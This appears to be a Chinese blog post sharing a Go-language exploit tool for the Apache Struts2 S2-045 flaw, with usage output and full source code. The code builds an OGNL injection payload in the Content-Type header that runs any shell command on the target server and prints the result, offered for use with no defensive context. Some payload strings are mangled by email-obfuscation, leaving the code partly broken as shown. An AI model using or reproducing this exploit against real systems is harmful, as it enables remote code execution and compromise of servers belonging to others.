Struts2漏洞利用工具exp-golang

  • 2019-05-15
  • 0
  • 0
使用golang实现的一个小工具
使用方法:
[email protected]:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0      Link encap:Ethernet  HWaddr 52:54:E4:D1:15:00
          inet addr:192.168.1.8  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6575210434 (6.1 GiB)  TX bytes:939669875 (896.1 MiB)

源代码:
package main
import (
	"bytes"
	"flag"
	"fmt"
	"log"
	"mime/multipart"
	"net/http"
)
/* 给body添加类似上传文件的mime/multipart内容 */
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
	body := &bytes.Buffer{}
	writer := multipart.NewWriter(body)
	for key, val := range params {
		_ = writer.WriteField(key, val)
	}
	writer.Close()
	return http.NewRequest("POST", url, body)
}
func main() {
	flag.Parse()
	url := flag.Arg(0)
	cmd := flag.Arg(1)
	payload := "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)" +
		":((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensym" +
		"[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +
		".(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@[email protected]('os.name').toLowerCase().c" +
		"ontains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))." +
		"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOut" +
		"putStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
	extraParams := map[string]string{
		"Test": "",
	}
	request, err := newMultipartRequest(url, extraParams)
	if err != nil {
		log.Fatal(err)
	}
	request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
	request.Header.Set("Content-Type", payload)
	client := &http.Client{}
	resp, err := client.Do(request)
	if err != nil {
		log.Fatal(err)
	} else {
		/* 读取response返回数据 */
		body := &bytes.Buffer{}
		_, err := body.ReadFrom(resp.Body)
		if err != nil {
			log.Fatal(err)
		}
		resp.Body.Close()
		fmt.Println(resp.StatusCode)
		fmt.Println(resp.Header)
		fmt.Println(body)
	}
}

评论

还没有任何评论,你来说两句吧